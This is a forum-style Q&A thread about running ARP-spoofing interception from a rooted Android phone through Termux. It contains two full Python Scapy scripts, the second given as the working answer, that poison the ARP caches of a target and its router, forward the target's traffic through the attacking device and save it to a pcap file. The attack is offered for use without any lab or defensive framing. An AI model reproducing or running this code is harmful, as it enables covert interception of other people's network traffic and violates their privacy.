IP forwarding on rooted Android using Termux
Is it possible to intercept traffic with ARP-spoofing on Termux(rooted Android)?
I have this python script:
from scapy.all import *
from scapy.interfaces import *
from threading import Thread
import logging
import time
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)


def arp_spoofing():
    eth = Ether()
    arp = ARP(pdst=target_ip, psrc=gateway_ip, op="is-at")
    packet = eth / arp

    while True:
        sendp(packet, iface=iface, verbose=False)
        time.sleep(2)


def get_mac(ip):
    arp_request = ARP(pdst=ip)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request

    answ = srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    try:
        return answ[0][1].hwsrc
    except:
        get_mac(ip)


def forward_packet(pkt):
    if pkt[Ether].src == target_mac and pkt[Ether].dst == attacker_mac:
        pkt[Ether].src = attacker_mac
        pkt[Ether].dst = gateway_mac
        sendp(pkt, verbose=False)
    elif pkt[Ether].src == gateway_mac and pkt[Ether].dst == attacker_mac:
        pkt[Ether].src = attacker_mac
        pkt[Ether].dst = target_mac
        sendp(pkt, verbose=False)
    wrpcap(filename, pkt, append=True)
    print(f'-----------------------------------------\nPacket intercepted:\nfrom: {pkt[IP].src}\nto: {pkt[IP].dst}\n')
    layers = []
    for i in range(len(pkt.layers())):
        layers.append(pkt.getlayer(i).name)
    print(f'Network layers: ', end='')
    print(*layers)
    if TCP in pkt:
        print(f'TCP port: {pkt[TCP].dport}')
    print('-----------------------------------------')


def sniffer():
    while True:
        sniff(prn=forward_packet, filter=filter, iface=iface, count=1)


iface = get_working_if()
filename = input('Name of .pcap file: ') + '.pcap'
target_ip = input('Target IP in local network: ')
target_mac = get_mac(target_ip)
gateway_ip = input('Router IP in local network: ')
gateway_mac = get_mac(gateway_ip)
attacker_mac = Ether().src
filter = f'(ip src {target_ip}) or (ip dst {target_ip})'

mitm = Thread(target=arp_spoofing)
proxy = Thread(target=sniffer, daemon=True)
proxy.start()
mitm.start()


It seems to work on Linux desktop with net.ipv4.ip_forward=1, so I tried to enable ip_forward on my Android phone.
I've tried next commands:
1.
echo 1 | sudo grep /proc/sys/net/ipv4/ip_forward




sudo sysctl net.ipv4.ip_forward=1

It changes needed parameter from 0 to 1, but I need to reboot the device to make IP forwarding work. So, when I do it, ip_forward is 0 again.
What should I do to enable IP forwarding and make this changes persistent(save them on reboot)?
Or can I redirect traffic using Scapy and Python?

You first command does nothing (it greps 1\n for the path given, which gives no result) and your second command should be applied in the kernel immediately. But that is not a programming topic.

@KlausD.
First command writes 1 to /proc/sys/net/ipv4/ip_forward, but, anyways, it doesn't seem to make wanted results. Thanks for your recommendations!

It seems like I've found the solution. There was no need to enable ip_forward. I've simply changed my code:
from scapy.all import *
from scapy.interfaces import *
from threading import Thread
import logging
import time
import sys
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 
 
def fprint(data):
    sys.stdout(data)
 
 
def arp_spoofing():
    eth = Ether()
    arp1 = ARP(pdst=gateway_ip, psrc=target_ip, op="is-at")
    arp = ARP(pdst=target_ip, psrc=gateway_ip, op="is-at")
    packet = eth / arp
    packet1 = eth / arp1
 
    while True:
        sendp(packet, iface=iface, verbose=False)
        sendp(packet1, iface=iface, verbose=False)
        time.sleep(10)
 
 
def get_mac(ip):
    arp_request = ARP(pdst=ip)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
 
    answ = srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    try:
        if answ[0][1].hwsrc is not None:
            return answ[0][1].hwsrc
        else:
            get_mac(ip)
    except:
        get_mac(ip)
 
 
def forward_packet(pkt):
    if pkt[Ether].src == target_mac and pkt[Ether].dst == attacker_mac:
        pkt[Ether].src = attacker_mac
        pkt[Ether].dst = gateway_mac
        sendp(pkt, verbose=False)
    elif pkt[Ether].src == gateway_mac and pkt[Ether].dst == attacker_mac:
        pkt[Ether].src = attacker_mac
        pkt[Ether].dst = target_mac
        sendp(pkt, verbose=False)
    wrpcap(filename, pkt, append=True)
    print(f'-----------------------------------------\nPacket intercepted:\nfrom: {pkt[IP].src}\nto: {pkt[IP].dst}\n')
    layers = []
    for i in range(len(pkt.layers())):
        layers.append(pkt.getlayer(i).name)
    print(f'Network layers: ', end='')
    print(*layers)
    if TCP in pkt:
        print(f'TCP port: {pkt[TCP].dport}')
    print('-----------------------------------------')
 
 
def sniffer():
    sniff(prn=forward_packet, filter=filter, iface=iface)
 
 
iface = get_working_if()
filename = input('Name of .pcap file: ') + '.pcap'
target_ip = input('Target IP in local network: ')
target_mac = get_mac(target_ip)
gateway_ip = input('Router IP in local network: ')
gateway_mac = get_mac(gateway_ip)
attacker_mac = '<MY MAC ADDRESS>'
filter = f'(ip src {target_ip}) or (ip dst {target_ip})'
 
mitm = Thread(target=arp_spoofing, daemon=True)
proxy = Thread(target=sniffer)
proxy.start()
mitm.start()

And now it works the way I wanted it to. The target remains connected to the network, and the attacking device intercepts its traffic.
I hope my answer will help someone who faces a similar task.

Appreciate you posted the solution.
